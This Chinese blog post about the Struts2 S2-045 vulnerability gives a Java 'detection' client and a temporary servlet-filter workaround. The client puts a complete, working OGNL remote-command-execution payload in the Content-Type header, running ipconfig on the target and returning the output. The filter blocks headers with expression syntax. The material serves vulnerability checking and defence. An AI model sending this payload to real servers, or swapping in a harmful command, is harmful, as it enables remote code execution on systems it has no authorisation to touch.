struts2 s2-045漏洞检测 &临时解决方案

    xiaoxiao2021-03-25  118

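    // Struts2 vulnerability check code.
    // (Per the author, the file-upload code and the command-execution expression were both taken
    // from the internet rather than written for this post.)

    /**
     * Sends one multipart POST to {@code url} whose Content-Type header is an OGNL expression
     * instead of a media type, then prints the HTTP response.
     *
     * <p>What the request does, as visible in the header string below: the expression replaces
     * the OGNL member-access policy, clears the excluded package/class lists, runs the command
     * held in {@code #cmd} through {@code ProcessBuilder}, and copies that process's output into
     * the servlet response. A response body containing the command's output therefore means the
     * target evaluated the header, i.e. it is affected by S2-045.
     *
     * <p>For defenders, the distinguishing trait of this request is a Content-Type value that
     * begins with {@code %{} and contains {@code ognl}; that is the trait the servlet filter
     * further down rejects.
     *
     * @param url      address of a Struts2 action to send the request to
     * @param filePath local file attached as the {@code datums} part
     * @return always the empty string; the result is only printed to standard output
     */
    public static String upload(String url, String filePath) {
        String fdfsPath = ""; // never read; left over from the borrowed upload code
        try {
            DefaultHttpClient httpclient = new DefaultHttpClient();
            HttpPost httppost = new HttpPost(url);
            File file = new File(filePath);
            String name = file.getName();
            // NOTE(review): this stream is never closed explicitly.
            InputStream in = new FileInputStream(file);
            MultipartEntity reqEntity = new MultipartEntity();
            InputStreamBody inputStreamBody = new InputStreamBody(in, name);
            // NOTE(review): the form fields below look like sample values carried over from the
            // borrowed upload code. reqEntity is never attached to httppost in the visible code,
            // so the check appears to depend only on the Content-Type header - confirm.
            StringBody fileNam = new StringBody(name);
            StringBody dateFlag = new StringBody("20160122152301");
            StringBody datumType = new StringBody("0");
            StringBody uploadWay = new StringBody("0");
            StringBody userId = new StringBody("0538");
            StringBody tenderId = new StringBody("2315");
            StringBody metrialsType = new StringBody("25");
            StringBody ip = new StringBody("0.0.0.1");
            StringBody driverName = new StringBody("huawei");
            StringBody systemVersion = new StringBody("djf");
            StringBody position = new StringBody("信息路38", Charset.forName("utf8"));
            reqEntity.addPart("datums", inputStreamBody);
            reqEntity.addPart("fileName", fileNam);
            reqEntity.addPart("dateFlag", dateFlag);
            reqEntity.addPart("datumType", datumType);
            reqEntity.addPart("uploadWay", uploadWay);
            reqEntity.addPart("userId", userId);
            reqEntity.addPart("tenderId", tenderId);
            reqEntity.addPart("metrialsType", metrialsType);
            reqEntity.addPart("ip", ip);
            reqEntity.addPart("driverName", driverName);
            reqEntity.addPart("systemVersion", systemVersion);
            reqEntity.addPart("position", position);
            // The original post also carried a commented-out "linux" variant of the next call.
            // It is identical except that #cmd is 'ifconfig' instead of 'ipconfig'.
            // windows
            httppost.addHeader("Content-Type", "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}");
            httppost.addHeader("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");
            HttpResponse response = httpclient.execute(httppost);
            int statusCode = response.getStatusLine().getStatusCode();
            if (statusCode == HttpStatus.SC_OK) {
                System.out.println("服务器正常响应.....");
                HttpEntity resEntity = response.getEntity();
                // Read the response body with HttpClient's own utility class.
                System.out.println(EntityUtils.toString(resEntity));
                // Prints the stream object itself, not the body (already read above).
                System.out.println(resEntity.getContent());
                EntityUtils.consume(resEntity);
            } else {
                System.out.println(HttpStatus.getStatusText(statusCode));
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        System.out.println("结束....");
        return "";
    }

    /** Runs the check once against the placeholder URL and local file used in the post. */
    public static void main(String args[]) throws IOException {
        System.out.println("开始....");
        upload("http://www.xxx.cn/website/index.do", "E:\\www\\index.txt");
    }

    // ------------------------------------------------------------------------------------------------
    // Temporary workaround: ForbiddenAccessFilter.java

    /**
     * Stopgap servlet filter that rejects requests whose Content-Type header looks like an OGNL
     * expression before they can reach the Struts2 multipart handling.
     *
     * <p>This is a mitigation, not a fix: it inspects only the Content-Type header and relies on
     * pattern matching, so the durable remedy is upgrading Struts2 to a release that fixes S2-045.
     * The filter must run ahead of the Struts2 filter to have any effect.
     */
    public class ForbiddenAccessFilter extends OncePerRequestFilter {

        /** Upper bound on how much of a rejected header value is written to the log. */
        private static final int MAX_LOGGED_CHARS = 256;

        /**
         * Blocks the request with HTTP 400 when its Content-Type is suspicious, otherwise passes
         * it down the chain unchanged.
         *
         * @throws ServletException propagated from the rest of the filter chain
         * @throws IOException      propagated from the chain or from writing the error response
         */
        @Override
        protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response,
                FilterChain chain) throws ServletException, IOException {
            String contentType = request.getContentType();
            if (contentType != null && looksLikeExpression(contentType)) {
                System.out.println(sanitizeForLog(contentType));
                // Answer explicitly; the original returned without setting a status, which left
                // the client with an empty success response.
                response.sendError(HttpServletResponse.SC_BAD_REQUEST);
                return;
            }
            chain.doFilter(request, response);
        }

        /**
         * Reports whether a Content-Type value carries expression syntax. Besides the original
         * "ognl" substring (now matched case-insensitively), the {@code %{} and {@code ${}
         * expression openers are rejected, since neither is expected in a legitimate media type.
         */
        private static boolean looksLikeExpression(String contentType) {
            String lowered = contentType.toLowerCase(java.util.Locale.ROOT);
            return lowered.contains("ognl") || lowered.contains("%{") || lowered.contains("${");
        }

        /**
         * Makes an attacker-controlled header value safe to print: control characters (including
         * CR/LF, which could forge log lines) are replaced and the length is capped.
         */
        private static String sanitizeForLog(String value) {
            String printable = value.replaceAll("\\p{Cntrl}", "_");
            return printable.length() > MAX_LOGGED_CHARS
                    ? printable.substring(0, MAX_LOGGED_CHARS) + "..."
                    : printable;
        }
    }

    // web.xml configuration
    <!-- Declare this filter-mapping before the Struts2 filter's mapping: filters run in the
         order their mappings appear, and the check only helps if it runs first. -->
    <filter>
        <filter-name>forbiddenAccessFilter</filter-name>
        <filter-class>com.ahtec.webapp.filters.ForbiddenAccessFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>forbiddenAccessFilter</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>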

    --------------------------------------------------------------------------------------------------
